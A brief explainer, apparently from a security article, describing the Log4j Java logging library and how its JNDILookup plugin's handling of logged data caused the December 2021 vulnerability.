What is Log4j?
Log4j is a library used by Java developers to enable logging within the applications they create. Its use is widespread with virtually every Java application using it in one way or another. The vulnerability identified in December 2021 was found in Log4j library version 2.0 beta 9, with exploitation attempts being recorded by Cloudflare as early as December 1st.
The vulnerable section of the library was the Java Naming and Directory Interface (JNDILookup) plugin which allows a developer to enrich data that is being logged by the application. The JNDILookup API enables the application to look up objects and retrieve data from various protocols such as DNS, RMI, LDAP/S and its poor handling of the data being logged is the cause of the issues.